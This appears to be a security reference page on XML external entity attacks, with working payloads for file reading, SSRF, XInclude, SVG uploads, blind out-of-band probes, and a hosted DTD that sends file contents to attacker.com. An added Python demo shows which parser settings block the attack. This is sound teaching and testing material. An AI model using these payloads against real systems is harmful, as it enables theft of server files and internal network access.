XML external entity (XXE)

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

-- Wikipedia

Generally, XXE vulnerabilities arise when the XML parser used by the app resolves external entities and/or processes XInclude. Many parsers do this by default, so the parser configuration (DTD processing disabled, or at least external entities and XInclude off) decides whether the payloads below work.

Retrieve files

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE file [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<some><xml>&xxe;</xml></some>

The file content only shows up if the app reflects the value of the element containing &xxe; in its response; otherwise use the blind techniques below.

SSRF

<!DOCTYPE request [ <!ENTITY xxe SYSTEM "http://internal.website.com"> ]>

The entity still has to be referenced (&xxe;) in the document body. If the app reflects the element, the response of the internal request is returned; if not, the request is still made (blind SSRF).

XInclude

You may be able to use XInclude when you don't have control over the DOCTYPE element, e.g. in SOAP requests. parse="text" is needed to read files that are not well-formed XML.

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
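
The following is an added example (not part of the original page) that shows how the parser configuration from the introduction decides whether the "Retrieve files" and XInclude payloads above work. It uses Python's standard-library xml.sax (expat) parser in a weak, a default and a hardened configuration, plus xml.etree.ElementInclude for the XInclude variant. The secret file is a constructed temporary file standing in for /etc/passwd, and the helper names (TextCollector, RejectDoctype, parse_with_sax, parse_with_xinclude, demo) are this example's own.

```python
"""Added example: the same file-retrieval payload against three xml.sax
configurations, and the XInclude payload against ElementInclude."""
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.etree import ElementInclude, ElementTree
from xml.sax.handler import (ContentHandler, feature_external_ges,
                             property_lexical_handler)


class TextCollector(ContentHandler):
    """Records the character data the parser delivers, i.e. what &xxe; expands to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    @property
    def text(self):
        return "".join(self.parts)


class DoctypeRejected(Exception):
    """Raised by the hardened configuration when the document carries a DTD."""


class RejectDoctype:
    """Lexical handler whose startDTD aborts parsing. Without a DTD no entity
    (external, parameter or otherwise) can be declared, which is the simplest
    hardening when the app does not need DTDs at all."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected("DOCTYPE %r is not allowed" % name)

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def file_retrieval_payload(path):
    """The 'Retrieve files' payload from the page, pointed at a local file."""
    uri = pathlib.Path(path).resolve().as_uri()          # file:///...
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE file [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
        '<some><xml>&xxe;</xml></some>' % uri
    ).encode("utf-8")


def parse_with_sax(xml_bytes, resolve_external=False, reject_doctype=False):
    """Parse with xml.sax and return the document's text content.

    resolve_external=True is the weak configuration: SYSTEM entities are
    fetched (file://, http://, ...). Python turns this off by default since 3.7.1.
    """
    parser = xml.sax.make_parser()
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.setFeature(feature_external_ges, resolve_external)
    if reject_doctype:
        parser.setProperty(property_lexical_handler, RejectDoctype())
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text


def xinclude_payload(path):
    """The XInclude payload from the page. ElementInclude's default loader opens
    plain local paths rather than file:// URLs, hence the bare path in href."""
    return (
        '<foo xmlns:xi="http://www.w3.org/2001/XInclude">'
        '<xi:include parse="text" href="%s"/></foo>' % path
    ).encode("utf-8")


def parse_with_xinclude(xml_bytes):
    """ElementTree never resolves external entities, but an explicit
    ElementInclude.include() call inlines whatever local file href names."""
    root = ElementTree.fromstring(xml_bytes)
    ElementInclude.include(root)
    return root.text or ""


def demo():
    """Run every configuration against a constructed secret file. Returns
    (leaked_via_entity, text_with_entities_disabled, doctype_rejected, leaked_via_xinclude)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")   # constructed stand-in for /etc/passwd
        secret = f.name
    try:
        payload = file_retrieval_payload(secret)
        leaked = parse_with_sax(payload, resolve_external=True)
        disabled = parse_with_sax(payload)               # &xxe; expands to nothing
        try:
            parse_with_sax(payload, reject_doctype=True)
            rejected = False
        except DoctypeRejected:
            rejected = True
        included = parse_with_xinclude(xinclude_payload(secret))
    finally:
        os.unlink(secret)
    return leaked, disabled, rejected, included


if __name__ == "__main__":
    labels = ("external entities enabled", "external entities disabled",
              "DOCTYPE rejected", 'XInclude parse="text"')
    for label, value in zip(labels, demo()):
        print("%-27s %r" % (label + ":", value))
```

With external entity resolution enabled the parser hands back the file content as the text of the element; with it disabled the entity reference expands to an empty string, and the DOCTYPE-rejecting configuration refuses the document before any entity is declared. The XInclude run shows the point made above: a parser that is safe against external entities (ElementTree) can still be made to read local files once XInclude processing is turned on.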

File uploads

Sometimes XML-based file formats such as SVG or DOCX (a ZIP archive of XML documents) can be uploaded and are then parsed by the app.

E.g. XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250]

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
    <text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text>
</svg>

Blind XXE

You can use out-of-band application security testing (OAST) to detect blind XXE vulnerabilities, e.g. by pointing the entity at a Burp Collaborator host and watching for the DNS/HTTP interaction.

<!DOCTYPE oast [ <!ENTITY xxe SYSTEM "https://attacker.com"> ]>

Via parameter entities (a parameter entity is expanded inside the DTD itself, so the request is sent even if the app never uses the entity in the document body, and this also works where regular entities are blocked):

<!DOCTYPE oast [ <!ENTITY % xxe SYSTEM "https://attacker.com"> %xxe; ]>

Exfiltrate data

Create a malicious.dtd file, hosted on an attacker-controlled system. &#x25; is the encoded %, which lets the nested parameter entity be declared inside an entity value (a literal % would be expanded while the DTD is read). The file content ends up in a URL, so this only works for files without newlines or characters that break the URL or the XML; /etc/hostname is a safe test target:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

XXE payload on target:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>

Retrieve data via error message

Create a malicious.dtd file, hosted on an attacker-controlled system. The file content becomes part of a non-existent path, so it is leaked in the parser's error message (if the app returns it) and, unlike the URL-based exfiltration above, multi-line files such as /etc/passwd work:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

XXE payload on target:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>

Modified content type

Some apps accept text/xml as the content type of POST requests instead of e.g. application/x-www-form-urlencoded. If so, the request body can be resubmitted as XML (the former parameters as elements, plus a DOCTYPE); the malicious XML is then processed by the app and may be exploitable that way.
